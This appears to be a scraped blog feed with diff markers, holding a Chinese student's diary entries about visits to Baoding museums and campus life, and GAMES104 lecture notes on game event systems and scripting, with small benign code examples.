​ 太平兴国六年(981),改清苑县为保塞县,保塞军升保州。
    ​ 金天会七年(1129),在保州设顺天军,保州为顺天军节度使驻地。

    元代——保定设郡及保定之名的开始

    ​ 元太宗十一年(1239),以保州为顺天路治所。元至元十二年(1275),改顺天路为保定路,
    “保定”之名至此始,寓“保卫大都,安定天下”之意。

    明代——保定建府

​ 明洪武元年(1368),改保定路为保定府。洪武二十年(1387 年)设置大宁都司,治所在大宁卫(今内蒙古宁城西),永乐元年(1403)迁至保定。永乐十九年(1421),正式迁都北平(今北京),保定成为都南重镇。

    清代——保定成为直隶省会及冀北干城

    ​ 清康熙八年(1669),直隶巡抚由正定移驻保定,保定成为直隶省省会。
    雍正二年(1724),特授直隶巡抚李维钧为直隶总督,保定成为直隶总督驻地。
自此至清亡(1911),保定一直是河北的政治、经济、文化、教育和军事中心,因有“冀北干城”之称。

    燕南赵北 水利肇始

​唐尧统治时期发生世纪大洪水,大禹在冀州的治水开世纪大洪水治理之肇始。四季分明的气候特点、河流淀泊众多的水资源条件、地处中原农耕与北方游牧民族分界的独特地理位置,使保定地区在战国时期即拥有富饶的督亢灌区和相对发达的区间航运,规划建成令人惊叹的城市排水系统,衍生出“风萧萧兮易水寒”的悲壮历史,并在北魏时期孕育出《水经注》等富有文学色彩的地理名著。

    治水著名人物 治水著名人物 治水著名人物
    治水著名人物

    ​没想到吧!这些人都是保定的。

    《直隶总督方观承视察清河道署》

    ​该作品反映的是清乾隆年间周元理任清河道员时,曾任过清河道员、时任直隶总督的方观承前来视察,周元理正与其他陪同官员在清河道署接待奏事的场景。

    取水设备 取水设备 取水设备 取水设备

    ​还有一些取水设备,可以亲自体验!就能看到小孩子们在这里玩水。

    东湖公园

    ​古莲花池这个学期去过一次了,就算了。

    ​来东湖公园看看荷花等各种花,平替一下。

    花花 花花 花花 花花 花花 花花 花花 花花 花花 花花
    花花

    6.24

    荷花 荷花
    荷花

    ​冀大特产,双色荷花!

    不正宗赣面

    ​冀大卖牛肉汤的食堂开了家赣面,让我试试。

    ​虽然它一点也不正宗,但我觉得还蛮好吃的,甚至比正宗的还要好吃😇。

    紫色花

    6.25

    6.26

    红配绿,______

    李子

    ​冀大里长了很多李子,可以打来吃。

    看来学校李子还蛮多的
    yes
    我已经打了两次了
    拿棍子打的

    6.27

    6.28

    强者的座位

    一看就是强者的座位😍

    ​伟哥要去厦门打工了,祝他事业顺利!

    ​于是我顺势坐上了他的工位。在空调底下感觉凉快了不少😍。

    ​再夸一次伟哥是一个很自律的人,相比之下,我还是太浮躁了😪。

    6.30


    东北大白梨

    ​试一试在南方根本买不到的东北特色饮品!噢!我的上帝啊!这个味道就跟牙膏兑水的感觉一样。


    ​买好了去广州的票,感觉日子又有盼头了😍!

    ]]>
    + 前言

    每日任务

    ​不出意外的话,这将是这个学期倒数第二篇 Diary 了,坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    正文

    6.17-6.21

    ​整理 6.16 在国博拍的照片中……国博真是太好玩了,我评价为北京最佳😭。为所拍的文物查阅各种资料,从中学习到了不少东西;为了便于更好地在网页上展示我在国博扫的货,还特意设计了一个前端方法,我真是太雅了🤤!

    ​歷史學家卡爾(E. H. Carr,1892~1982 年)曾說:「歷史是歷史家和歷史事實之間不斷交互作用的過程,是現在與過去無止盡的對話。」仔細分析這段話可以發現歷史存在「兩個時間和空間」,一個是歷史事件發生的時空環境,另一個是歷史家所處的時空環境,過去的歷史固然應該以過去的時空條件去解釋、理解其背景和意義,不過也必須注意到歷史家所存在的時間與空間,因為不同的歷史家處於不同的時間、空間,和歷史記錄的對話也將呈現不同的樣貌。

    ​同時,我們也必須有所警覺,長期以來的歷史記錄,以官方史家所撰寫的史書(正史)論述為主,多半以統治者的觀點書寫,因此必須多方蒐集各種史料,更為深入歷史情境,理解不同時代人們所存在的歷史時空環境,包括政治制度、社會規範,以及與外界互動的情形,才能對歷史日常有比較客觀的認識。

    ​挺感谢初中的历史老师,是她让我激发起了对历史的兴趣,让我不至于在国博里像个白痴一样漫无目的地参观。我犹记得她曾经说过的一句话:“这节课虽然中考不考,但是我认为这是一个中学生所应该了解的。”我能感受到她对这门学科真正的理解和热爱,而不是拘泥在教条中。我想,不拘泥于教条,不随人云亦云,拥有独立辩证思考的能力,能够以史为鉴并应用到其他领域中,才是学习历史的最大意义吧🤔。同时,我很鄙视那些德不配位,溜须拍马,见风使舵的“砖家”(不只于历史领域)。

    ​很多华丽的文物背后其实蛮恐怖的。

    ​我翻开历史一查,这历史没有年代,歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着,仔细看了半夜,才从字缝里看出字来,满本都写着两个字是“吃人”!

    ——鲁迅

    ​同时感觉中国发展不平衡的现象十分明显🫥,这是一个复杂的社会问题。

    ​读研后开始喜欢逛博物馆,到现在也逛了不老少。整理照片的时候还发现曾在不同博物馆里看到了同样的东西,就挺搞笑的。

    6.23 特别篇——要润了再去莲池逛逛吧

    ​这天中午想去市区走走。坐公交去老校区解决一下午饭问题。午饭 Only¥9,真便宜呀真便宜。

    假 · 后母戊鼎

    ​岁逢辛卯。序属深秋,河北大学迎来九十华诞。时逢盛世,学府生辉,古城各界共瞻文化盛典。为感谢多年来河北大学传承文化、培育英才,建设银行保定分行特铸青铜鼎,以铭功铵绩,昭示来兹。其铭曰

    京畿名校,燕赵学府;九十看秋,创业奔流;
    求是先风,驾学诚行;心忧天下,历史使命;
    培育英才,桃李芬芳;银校携手,驰援相助;
    诚纳俊杰,良禽栖木;融资助收,服务师生;
    合作共赢,砥砺前行;奋翮高飞,再创辉煌。

    ​冀大博物馆前面的假 · 后母戊鼎。

    某花

    ​盛夏,又是河北花开放的另一高峰。

    保定军校

    ​保定陆军军官学校始建于 1902 年,前身为北洋陆军行营将弁学堂、陆军速成武备学堂、陆军预备大学堂等。1912 年正式创办保定陆军军官学校,1923 年 8 月停办。前后共培养出 11000 余名学生,仅后来成为将军的就有 1500 余人,被称为“将军的摇篮”。

    ​啊!河北保定!曾经也辉煌过。

    军校广场雕像 军校广场雕像
    军校广场雕像 军校广场雕像 军校广场雕像 军校广场雕像
    军校广场雕像
    将军摇篮简介

​雕塑主体是一位身着戎装骑马驰骋的将军代表,象征着保定军校是诞生将军的摇篮;

​圆柱与雕塑的方形基座组成天圆地方的文化符号,象征着军校学员——胸怀报国理想而驰骋于天地之间的志士;

    ​圆柱体的外形还代表“1”,表示保定军校是中国近代第一所正规化的军事院校;雕塑总高 19.02 米,象征着保定军校始办于 1902 年。基座的台阶为 9 级代表着保定军校共培养了 9 期学员;中心圆柱以环形的浮雕进行装饰,从而构成雕塑整体的有机组成部分。浮雕正面是 5 位军官全身正像,是保定军校所设置的 5 科专业的军人代表,周边的图案则是对步兵、骑兵、工兵、炮兵、辎重兵的形象化描述。

    棋类运动 棋类运动
    棋类运动

    ​无聊地把军校广场上的象棋棋盘复位,结果发现少了仨子😅。

    ​这个围棋不让把棋子拿开我都不知道该怎么下。

    保定军校

    ​啊!保定军校,上承北洋,下开黄埔。因为暑假前特想去广州逛逛,就想再来看看传说中“下开黄埔”的保定军校。

    保定军校纪念馆

​保定军校(1902~1923 年)是自晚清至民国时期,由直隶总督兼北洋大臣袁世凯在保定创办的一系列军事教育机构的统称,是中国军事大变革的重要标志,开创了近代中国正规化军事教育之先河。期间开办了北洋行营将弁学堂、北洋陆军速成武备学堂、陆军部陆军速成学堂、陆军军官学堂(陆军预备大学堂)、陆军军官学校等学校。其中,民国建立后开办的陆军军官学校,是中国近代史上规模最大、设施最完备、学制最正规、门类最齐全的军事学府,自 1912 年开办到 1923 年停办,共办 9 期,设步科、骑科、炮科、工科、辎重科等兵科,经历赵理泰、蒋方震、曲同丰、王汝贤、杨祖德、贾德耀、张鸿绪、孙树林等 8 位校长,毕业学生 6574 人。从 1902 年开办的北洋行营将弁学堂算起,这里共培养出 11000 余名军事领导人才,仅后来成为将军的有 2000 余人,被誉为“将军摇篮”。其中,蒋介石、张群、李济深、陈调元、叶挺、邓演达、赵博生、董振堂、蒋光鼐、陈铭枢、刘文辉、唐生智、张治中、傅作义、顾祝同、黄琪翔、钱大钧、张克侠、何基沣、陶峙岳、陈诚、白崇禧等均为中国近现代史上的风云人物,保定军校也因此蜚声海内外。

    陆军军官学校

    ​恭喜!保定军校从 2 月份检修到现在还不给开😠!

    大慈阁

    大慈阁 大慈阁
    大慈阁

    ​坐公交车前往市中心。

    西大街

    直隶第一街 直隶第一街
    月满西街 · 情定古城 人民照像稻香村 可爱熊熊
    直隶第一街

    ​经过保定政府苦心经营,西大街总算有了些许生气!

    民国风

    ​感觉像上下杭。

    套圈圈

    ​在保定,感觉这种项目特别多。我若去玩,必白送钱。

    老乡你好

    ​我要笑死。

    前面的区域,以后再来探索吧!

    ​前面好像是开什么音乐会,不让进。

    清河道署

    保定水利博物馆

    ​来参观一下之前从未去过的一个小博物馆——清河道署!是清朝直隶时期管理水利的地方。啊!河北保定!曾经也辉煌过。

    保定水利博物馆
    保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆
    开冲!

    ​没人,不用预约,不用钱,身份证给保安,爷冲了!

    保定水系

    ​啊!河北保定!拒马河府河白洋淀,都属于海河水系。

    一定要根治海河
    一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河
    一定要根治海河

    ​中华人民共和国成立后,毛泽东主席发出了一定要根治海河的号召。自 1958 年开始,海河流域人民按照统一规划、综合治理的方针,从上游到下游,从支流到干流,对海河水系进行了全面根治。上百万治河大军包括中小学生、家庭妇女也挥锨上阵,完成了大大小小一系列整修工程,从根本上对海河进行了治理,终于使海河旧貌换新颜。

    ​海河自天津市区的三岔河口贯穿市区,至大沽口处入海,自古以来就养育了天津人民。海河对天津城市的形成和发展起了举足轻重的作用,但是,在旧时代也给海河流域的人民带来过不少灾难。海河水系支流众多,一到汛期同时涨水,而入海口处却肚大嘴小,宣泄不畅,水流速度越来越慢,泥沙沉积日益严重,排洪能力越来越差,常常形成海河流域的洪涝灾害,给广大人民群众的生活和海河地区社会经济发展造成很大危害。据记载,从 1368 年到 1948 年的 580 年间,海河流域发生过 387 次严重水灾,天津市被淹泡过 70 多次。

    ​河北省地级市天津被水淹了!河北省会保定不能坐视不管😭!

    7.21 暴雨

    ​2012 年 7 月 21 日,河北保定普降特大暴雨,致全市受灾人口 85.3 万人,受灾面积 413 万亩,涉及 11 个县(市)、121 个乡(镇),因灾死亡 31 人、失踪 17 人,紧急转移疏散 15.9 万人,直接经济损失 95.3 亿元。其中,涞源、涞水、易县损失严重。

    ​里面的展馆特别新,我感觉油漆味都没有散干净。

​看样子保定是个很容易闹洪水的地方。展馆里介绍了很多现代对保定治水所取得的成就,大肆邀功🤧。然而河北保定在经历了 2012.7.21 的特大暴雨后,在应对 2023.7.31 的台风中似乎没能做出什么进步。直到现在,保定下一场稍微大一点的雨,学校里都能产生不浅的积水🤬。

    (京爷吉祥😭)

    ​这里说保定是老北京永定河泄洪的一个地方,保定人看了鼻子不得气歪😠。


    ​这里还有一段保定治水史和保定发展史,记录一下。

    保定治水史
    前言

​独特的自然地理、水文水资源条件和区域发展需求,使保定水利具有显著的区域性和时代性。尧统治时,保定所在的冀州开世纪大洪水治理之肇始。春秋战国时期,保定拥有富饶的督亢灌区和相对发达的城市供排水系统。宋辽对峙时期,保定境内的白沟和雄县等地成为两国边界。为抵御辽军南侵,利用保定至渤海间的大清河、易水等河流及沼泽淀泊建成一条水上军事防线——“塘泺防线”。元明清三代定都北京,为保障首都防洪安全,开始大规模修筑潴龙河、永定河、白洋淀等堤防工程体系(京爷吉祥😭)。清雍正年间,怡亲王允祥则在京畿地区大规模营田种稻。近代,保定水利在艰难的环境下仍持续发展。新中国成立后,保定市的水利事业得到前所未有的发展,是历史上水利建设规模最大、效益最显著、成果最辉煌的时期。十八大以来,围绕安全水利、民生水利、资源水利、生态水利、智慧水利和文化水利等六大水利,保定市如火如荼地开展水利建设,掀起历史上又一次建设高潮,并开启“水兴保定”新时代。

    历史建制

​保定水利的发展与建置沿革具有密切的关系。春秋战国时期,燕国和中山国分别在保定以北和以南建都,后赵国灭中山而代之,保定因有“燕南赵北”之称。西汉高祖六年(前 201 年),在今满城置北平县,寓“平定北方”之意。宋建隆元年(960)设保塞军,寓“保卫边塞”之意;太平兴国六年(981),改为保州。元正大四年(1227)张柔重建保州城后,改称顺天路;至元十二年(1275)改为保定路。“保定”之名自此始,寓“保卫大都,安定天下”之意(京爷吉祥😭)。明初置保定府,永乐元年(1403)迁都北京,并将大宁都指挥使司迁驻保定,保定成为“都南屏障”(京爷吉祥😭)。清康熙八年(1669),直隶巡抚驻扎保定,保定成为直隶省会和“冀北干城”。1948 年,保定解放,建保定市。历史时期,保定不同阶段的水利建设具有不同的特征。

    保定古代史
    先秦——燕南赵北

​ 西周初,周武王封召公奭于燕,建都于蓟(今北京西南),今涞水一带属燕地。
    ​ 春秋时期,今保定北部属燕,南部属鲜虞(春秋末年改名中山)。
    ​ 战国时期,今保定北部属燕,南部属中山,赵灭中山后属赵,故有“燕南赵北”之称。燕昭王在今易县建下都。

    秦汉时期——县治分设

    ​ 秦统一中国后,实行郡县制。今保定南部属恒山郡,北部大多属广阳郡,另有广昌县(今涞源县)属代郡。秦代在此置县 7 个,即曲阳、涿县、广昌、范阳(今定兴)、易县(今雄县)、曲逆(今顺平)和庆都(今望都)。汉代实行郡国制,西汉新置县 18 个,东汉新置县 3 个。

魏晋南北朝隋唐五代十国

    ​ 这才发现,唐朝时期的河北几乎没啥历史……其它时段的保定估计老惨了😭,更没空整水利了。

    宋代——保州设立

    ​ 宋建隆元年(960),在清苑县设保塞军。
​ 太平兴国六年(981),改清苑县为保塞县,保塞军升保州。
    ​ 金天会七年(1129),在保州设顺天军,保州为顺天军节度使驻地。

    元代——保定设郡及保定之名的开始

    ​ 元太宗十一年(1239),以保州为顺天路治所。元至元十二年(1275),改顺天路为保定路,
    “保定”之名至此始,寓“保卫大都,安定天下”之意。

    明代——保定建府

​ 明洪武元年(1368),改保定路为保定府。洪武二十年(1387 年)设置大宁都司,治所在大宁卫(今内蒙古宁城西),永乐元年(1403)迁至保定。永乐十九年(1421),正式迁都北平(今北京),保定成为都南重镇。

    清代——保定成为直隶省会及冀北干城

    ​ 清康熙八年(1669),直隶巡抚由正定移驻保定,保定成为直隶省省会。
    雍正二年(1724),特授直隶巡抚李维钧为直隶总督,保定成为直隶总督驻地。
自此至清亡(1911),保定一直是河北的政治、经济、文化、教育和军事中心,因有“冀北干城”之称。

    燕南赵北 水利肇始

​唐尧统治时期发生世纪大洪水,大禹在冀州的治水开世纪大洪水治理之肇始。四季分明的气候特点、河流淀泊众多的水资源条件、地处中原农耕与北方游牧民族分界的独特地理位置,使保定地区在战国时期即拥有富饶的督亢灌区和相对发达的区间航运,规划建成令人惊叹的城市排水系统,衍生出“风萧萧兮易水寒”的悲壮历史,并在北魏时期孕育出《水经注》等富有文学色彩的地理名著。

    治水著名人物 治水著名人物 治水著名人物
    治水著名人物

    ​没想到吧!这些人都是保定的。

    《直隶总督方观承视察清河道署》

    ​该作品反映的是清乾隆年间周元理任清河道员时,曾任过清河道员、时任直隶总督的方观承前来视察,周元理正与其他陪同官员在清河道署接待奏事的场景。

    取水设备 取水设备 取水设备 取水设备

    ​还有一些取水设备,可以亲自体验!就能看到小孩子们在这里玩水。

    东湖公园

    ​古莲花池这个学期去过一次了,就算了。

    ​来东湖公园看看荷花等各种花,平替一下。

    花花 花花 花花 花花 花花 花花 花花 花花 花花 花花
    花花

    6.24

    荷花 荷花
    荷花

    ​冀大特产,双色荷花!

    不正宗赣面

    ​冀大卖牛肉汤的食堂开了家赣面,让我试试。

    ​虽然它一点也不正宗,但我觉得还蛮好吃的,甚至比正宗的还要好吃😇。

    紫色花

    6.25

    6.26

    红配绿,______

    李子

    ​冀大里长了很多李子,可以打来吃。

    看来学校李子还蛮多的
    yes
    我已经打了两次了
    拿棍子打的

    6.27

    6.28

    强者的座位

    一看就是强者的座位😍

    ​伟哥要去厦门打工了,祝他事业顺利!

    ​于是我顺势坐上了他的工位。在空调底下感觉凉快了不少😍。

    ​再夸一次伟哥是一个很自律的人,相比之下,我还是太浮躁了😪。

    6.30


    东北大白梨

    ​试一试在南方根本买不到的东北特色饮品!噢!我的上帝啊!这个味道就跟牙膏兑水的感觉一样。


    ​买好了去广州的票,感觉日子又有盼头了😍!

    ]]>
    @@ -1502,7 +1502,7 @@ /posts/Paper-Intelligent%20Data%20Analysis/ -
    ]]>
    +
    ]]>
    @@ -1527,7 +1527,7 @@ /posts/Diary-18-%E6%88%91%E8%A6%81%E8%80%83%E5%85%AD%E7%BA%A7%EF%BC%81/ - 前言

    ​6.16 在北京玩 high 了,姗姗来迟的本学年第 18 篇 Diary😅。

    6.3-6.16

    ​6.3-6.4 这两天的每日任务点还是被堵了进不去!

    正文

    6.8

    与伟哥拱趴中

    ​跟伟哥午饭的时候拱趴被他舍友偷拍了。

    6.9

​傍晚去东湖公园放放松~

    日落 日落

    ​拍出来的没有看的时候好看!调色一下。

    宁静歌谣石沉大海

    6.11

    火焰山?什么弟弟

    ​这段时间特别热,石家庄的气温直接爆表了。印象中去年这个时候也是这样,不过只持续很短一段时间。

    好看的冀大图书馆

    ​在冀大图书馆准备六级的日子就要结束了!

    肉粽

    ​77 从家里包了粽子回来。北方吃的都是甜粽子,77 为了体验一下南方风味,包了一个五花肉馅的咸粽子,吃起来还挺像回事的。有些凡哥就接受不了咸粽子的美味😠!

    6.13

    6.14

    盗版冰墩墩

    ​吃午饭的时候被人送了个盗版冰墩墩,然后要求下载抖音极速版帮她扫个码,扫完才感觉被坑了😬。

    6.15

    ​考完了六级,这次我觉得还行😭J 局我觉得我能赢😭。

    ​有些 pro 凡报考了多次六级却从来不准备,太不上进了啊 pro 凡😭。

    6.16

    ]]>
    + 前言

    ​6.16 在北京玩 high 了,姗姗来迟的本学年第 18 篇 Diary😅。

    6.3-6.16

    ​6.3-6.4 这两天的每日任务点还是被堵了进不去!

    正文

    6.8

    与伟哥拱趴中

    ​跟伟哥午饭的时候拱趴被他舍友偷拍了。

    6.9

​傍晚去东湖公园放放松~

    日落 日落

    ​拍出来的没有看的时候好看!调色一下。

    宁静歌谣石沉大海

    6.11

    火焰山?什么弟弟

    ​这段时间特别热,石家庄的气温直接爆表了。印象中去年这个时候也是这样,不过只持续很短一段时间。

    好看的冀大图书馆

    ​在冀大图书馆准备六级的日子就要结束了!

    肉粽

    ​77 从家里包了粽子回来。北方吃的都是甜粽子,77 为了体验一下南方风味,包了一个五花肉馅的咸粽子,吃起来还挺像回事的。有些凡哥就接受不了咸粽子的美味😠!

    6.13

    6.14

    盗版冰墩墩

    ​吃午饭的时候被人送了个盗版冰墩墩,然后要求下载抖音极速版帮她扫个码,扫完才感觉被坑了😬。

    6.15

    ​考完了六级,这次我觉得还行😭J 局我觉得我能赢😭。

    ​有些 pro 凡报考了多次六级却从来不准备,太不上进了啊 pro 凡😭。

    6.16

    ]]>
    @@ -1554,7 +1554,7 @@ /posts/GAMES104-Gameplay/ - 资源

    课程

    第十五节:游戏引擎的 Gameplay 玩法系统基础

    Gameplay Complexity and Building Blocks

    ​游戏复杂性和构建模块

    Outline of Gameplay System

    ​游戏系统概述

    Gameplay complexity and Building Blocks

    ​游戏复杂性和构建模块

    • Overview

      概述

    • Event Mechanism

      事件机制

    • Script System

      脚本系统

    • Visual Script

      可视化脚本

    • Character, Control and Camera

      角色、控制和相机

    AI

    Challenges in GamePlay (1/3)

    ​游戏玩法的挑战

    Cooperation among multiple systems

    ​多系统协作


    Challenges in GamePlay (2/3)

    Diversity of game play in the same game

    ​单种游戏多种玩法


    Challenges in GamePlay (3/3)

    Rapid iteration

    ​快速迭代


这款游戏在研发过程中改变了其玩法

    Epic acknowledged that within the Fortnite fundamentals, they could also do a battle royale mode, and rapidly developed their own version atop Fortnite in about two months.

    ​Epic 承认,在 Fortnite 的基本原理内,他们也可以做一款大逃杀模式,并在大约两个月内迅速在 Fortnite 的基础上开发了自己的版本。

    Event Mechanism

    ​事件机制

    Let Objects Talk

    ​让不同对象之间联系


    Event/Message Mechanism

    ​事件/消息机制

    • Abstract the world communication to messages

      将世界通信抽象为消息

    • Decoupling event sending and handling

      解耦事件发送和处理


    ​使用消息机制便于不同对象之间联系

    Publish-subscribe Pattern

    ​发布-订阅模式

    • Publisher categorizes published messages (events) into classes

      发布者将发布的消息(事件)分类为不同的类别

    • Subscriber receive messages (events) that are of interest without knowledge of which publishers

      订阅者接收感兴趣的消息(事件),但不知道是哪个发布者


    3 Key Components of Publish-subscribe Pattern

    ​发布-订阅模式的 3 个关键组件

    • Event Definition

      事件定义

    • Callback Registration

      回调注册

• Event Dispatching

      事件分派
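
​用一段极简的 JavaScript 把这三个组件串起来做个概念示意(与任何具体引擎无关,事件名和字段都是随手编的):

// 事件定义:类型枚举
const EventType = { EXPLOSION: "explosion" };

class EventDispatcher {
  constructor() {
    this.handlers = new Map(); // 事件类型 -> 回调列表
  }
  subscribe(type, callback) { // 回调注册
    if (!this.handlers.has(type)) this.handlers.set(type, []);
    this.handlers.get(type).push(callback);
  }
  dispatch(event) { // 事件分派:这里是立即分派,也可以先压进队列
    (this.handlers.get(event.type) || []).forEach((cb) => cb(event));
  }
}

const dispatcher = new EventDispatcher();
dispatcher.subscribe(EventType.EXPLOSION, (e) => console.log("play explosion at", e.position));
dispatcher.dispatch({ type: EventType.EXPLOSION, position: [10, 0, 3] }); // 事件 = 类型 + 参数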

    Event Definition

    ​事件定义


    ​定义事件的类型(枚举)和变量

    Type and Arguments

    ​类型和参数


    Impossible for hardcode

    ​硬编码不可能

    • Editable

      可编辑性


    Callback Registration

    ​回调注册

    Callback (function)

    ​回调(函数)

    • Any reference to executable code that is passed as an argument to another piece of code

      对作为参数传递给另一段代码的可执行代码的任何引用

    ​字面上的理解,回调函数就是一个参数,将这个函数作为参数传到另一个函数里面,当那个函数执行完之后,再执行传进去的这个函数。这个过程就叫做回调。
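
​举个最小的 JavaScript 例子(纯示意,loadTexture 是虚构的函数名):

function onTextureLoaded(texture) { // 回调函数本体
  console.log("texture ready:", texture.path);
}

function loadTexture(path, callback) { // 接收回调作为参数
  const texture = { path }; // 这里省略真实的异步加载过程
  callback(texture); // “加载”完成后,回头调用传进来的函数
}

loadTexture("hero.png", onTextureLoaded);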


    Object Lifespan and Callback Safety

    ​对象生命周期和回调安全

    Time points of registration and execution differs

注册与执行的时间点不同


    ​执行回调函数时,回调函数所在的对象已经被销毁了,报错。

    Object Strong Reference

    ​对象强引用


    Make sure to unregister callback function before delete objects, otherwise it will cause memory leak!

    ​删除对象前请务必注销回调函数,否则会造成内存泄漏!

    Prevent object from de-allocation as long as callback function still registered

    ​只要回调函数仍然注册,就防止对象被取消分配

    Object Weak Reference

    ​对象弱引用


Object could be de-allocated, and will check callback function if valid

    ​对象可以被取消分配,并且将检查回调函数是否有效
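
​弱引用的思路可以用 JavaScript 的 WeakRef 直观示意:分派前先 deref(),对象已被回收就跳过(概念示意,并非某个引擎的真实 API):

class WeakSubscriber {
  constructor(obj, methodName) {
    this.ref = new WeakRef(obj); // 弱引用:不阻止 obj 被 GC 回收
    this.methodName = methodName;
  }
  invoke(event) {
    const obj = this.ref.deref(); // 对象还活着才调用
    if (obj) obj[this.methodName](event);
    return obj !== undefined; // 返回 false 时可顺手把这条注册清理掉
  }
}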

    Event Dispatch

    ​事件分派

    • Send event to appropriate destination

      将事件发送到适当的目的地


    Event Dispatch: Immediate

    ​事件分派:立即


    parent function returns after callback function

    ​回调函数之后父函数返回,这么做可能出现如下问题:

    • Deep well of callbacks

      回调的深井


    ​这么做可能导致 Callstack 过长,占用内存。

    • Blocked by function

      被函数阻止

    ​期间某个函数耗时较长,导致帧率突然下降。


    The bleeding effect should be loaded but cost plenty of time in this function call

    ​应该加载出血效果,但在此函数调用中会花费大量时间

    • Difficult for parallelization

    ​难以并行化


    Event Queue

    ​事件队列

    Basic implementation

    ​基本实现

    • Store events in queue for handling at an arbitrary future time

      将事件存储在队列中,以便在未来的任意时间进行处理


    Event Serializing and Deserializing

    ​事件序列化和反序列化

    • To store various types of events

      存储各种类型的事件


Event Queue

    ​事件队列

    Ring buffer

    ​环形缓冲区

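​环形缓冲区就是固定大小的数组加读写下标,避免频繁分配内存(概念示意):

class RingEventQueue {
  constructor(capacity) {
    this.buf = new Array(capacity);
    this.head = 0; // 读下标
    this.tail = 0; // 写下标
    this.size = 0;
  }
  push(event) {
    if (this.size === this.buf.length) return false; // 队列已满,由上层决定丢弃或扩容
    this.buf[this.tail] = event;
    this.tail = (this.tail + 1) % this.buf.length;
    this.size++;
    return true;
  }
  pop() {
    if (this.size === 0) return undefined;
    const e = this.buf[this.head];
    this.head = (this.head + 1) % this.buf.length;
    this.size--;
    return e;
  }
}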

    Batching

    ​批处理


    Problems of Event Queue (1/2)

    ​事件队列的问题

    • Timeline not determined by publisher

  时间线不由发布者决定


    Problems of Event Queue (2/2)

    • One-frame delays

      一帧延迟


    Game Logic

    ​游戏逻辑

    Early Stage Game Logic Programming

    ​早期游戏逻辑编程

    Compiled language (mostly C/C++)

    ​编译语言(主要是 C/C++)

    • Compiled to machine code with high performance

      编译为高性能机器代码

    • More easier to use than assembly language

      比汇编语言更易于使用


    ​修改某个游戏逻辑需要重新编译整个游戏。

    Problem of Compiled Languages

    ​编译语言的问题

    Game requirements get complex as hardware evolves

    ​随着硬件的发展,游戏要求变得复杂

    • Need quick iterations of gameplay logic

      需要快速迭代游戏逻辑

    Issues with compiled language

    ​编译语言的问题

    • Need recompilation with even a little modification

      即使进行少量修改也需要重新编译

    • Program can easily get crashed with incorrect codes

      程序很容易因代码错误而崩溃

    Glue Designers and Programmers

    ​将设计师和程序员连接起来

    • Get rid of inefficient communication between designers and programmers

      摆脱设计师和程序员之间低效的沟通

    • Designers need direct control of gameplay logic

      设计师需要直接控制游戏逻辑

    • Artists need to quickly adjust assets at the runtime environment

      艺术家需要在运行时环境中快速调整资产


    Scripting Languages

    ​脚本语言

    • Support for rapid iteration

      支持快速迭代

    • Easy to learn and write

      易学易写

    • Support for hot update

      支持热更新

    • Stable, less crash by running in a sandbox

      沙盒运行稳定,崩溃少

function tick(delta)
    if input_system.isKeyDown(Keycode.W) then
        self:moveForward(delta)
    elseif input_system.isKeyDown(Keycode.S) then
        self:moveBackward(delta)
    end

    if input_system.isKeyDown(Keycode.MouseLeft) then
        self:fire(delta)
    end
    ...
end

Lua Script Example

    How Script Languages Work

    ​脚本语言的工作原理

    Script is converted to bytecode by a compiler first, then run on a virtual machine

    ​脚本首先由编译器转换为字节码,然后在虚拟机上运行


    Object Management between Scripts and Engine (1/2)

    ​脚本和引擎之间的对象管理 (1/2)

    Object lifetime management in native engine code

    原生引擎代码中的对象生命周期管理

    • Need to provide an object lifetime management mechanism

      需要提供对象生命周期管理机制

    • Not safe when script uses native objects (may have been destructed)

      当脚本使用原生对象时不安全(可能已被破坏)


    Object Management between Scripts and Engine (2/2)

    ​脚本和引擎之间的对象管理 (2/2)

    Object lifetime management in script

    脚本中的对象生命周期管理

    • The lifetime of objects are auto managed by script GC

      对象的生命周期由脚本 GC 自动管理

    • The time when object is deallocated is uncontrolled (controlled by GC)

      对象被释放的时间不受控制(由 GC 控制)

    • Easy to get memory leak if reference relations get complex in script

      如果脚本中的引用关系变得复杂,则容易发生内存泄漏


    Architectures for Scripting System (1/2)

    ​脚本系统架构 (1/2)

    Native language dominants the game world

    ​原生语言主导游戏世界

    • Most gameplay logic is in native code

      大多数游戏逻辑都采用原生代码

    • Script extends the functionality of native engine code

      脚本扩展了原生引擎代码的功能

    • High performance with compiled language

      编译语言带来高性能


    Architectures for Scripting System (2/2)

    Script language dominants the game world

    ​脚本语言主导游戏世界

    • Most gameplay logic is in script

      大多数游戏逻辑都在脚本中

    • Native engine code provides necessary functionality to script

      原生引擎代码为脚本提供必要的功能

    • Quick development iteration with script language

      使用脚本语言快速进行开发迭代


    Advanced Script Features - Hot Update

    ​高级脚本功能 - 热更新

    Allow modifications of script while game is running

    允许在游戏运行时修改脚本

    • Quick iteration for some specific logic

      针对某些特定逻辑进行快速迭代

    • Enable to fix bugs in script while game is online

      允许在游戏在线时修复脚本中的错误

    A troublesome problem with hot update

    ​热更新的一个麻烦问题

• All variables reference to old functions should be updated too

      所有引用旧函数的变量也应更新
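
​这个坑用几行 JavaScript 就能体会:热更新替换了函数变量,但之前缓存下来的旧引用仍指向老版本(概念示意):

let fire = () => console.log("old fire");
const cachedFire = fire; // 某处缓存了函数引用

fire = () => console.log("new fire"); // “热更新”替换了实现

fire();       // new fire
cachedFire(); // old fire —— 旧引用没有被更新到新函数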


    Issues with Script Language

    ​脚本语言的问题

    The performance is usually lower than compiled language

    ​性能通常低于编译型语言

    • Weakly typed language is usually harder to optimize when compile

      弱类型语言在编译时通常更难优化

    • Need a virtual machine to run the bytecode

      需要虚拟机来运行字节码

    • JIT is a solution for optimization

      JIT 是优化的解决方案

    ​Weakly typed language is usually harder to refactor

    ​弱类型语言通常更难重构


    Make a Right Choice of Scripting Language

    ​正确选择脚本语言

    Things need to be considered

    ​需要考虑的事项

    • Language performance

      语言性能

    • Built-in features, e.g. object-oriented programming support

      内置功能,例如面向对象编程支持

    Select the proper architecture of scripting

    ​选择合适的脚本架构

    • Object lifetime management in native engine code or script

      本机引擎代码或脚本中的对象生命周期管理

    • Which one is dominant, native language or script

      本机语言或脚本哪个占主导地位

    Popular Scripting Languages (1/2)

    ​热门脚本语言 (1/2)

    Lua (used in World of Warcraft, Civilization V)

    ​Lua(用于《魔兽世界》、《文明 5》)

    • Robust and mature

      强大且成熟

    • Excellent runtime performance

      出色的运行时性能

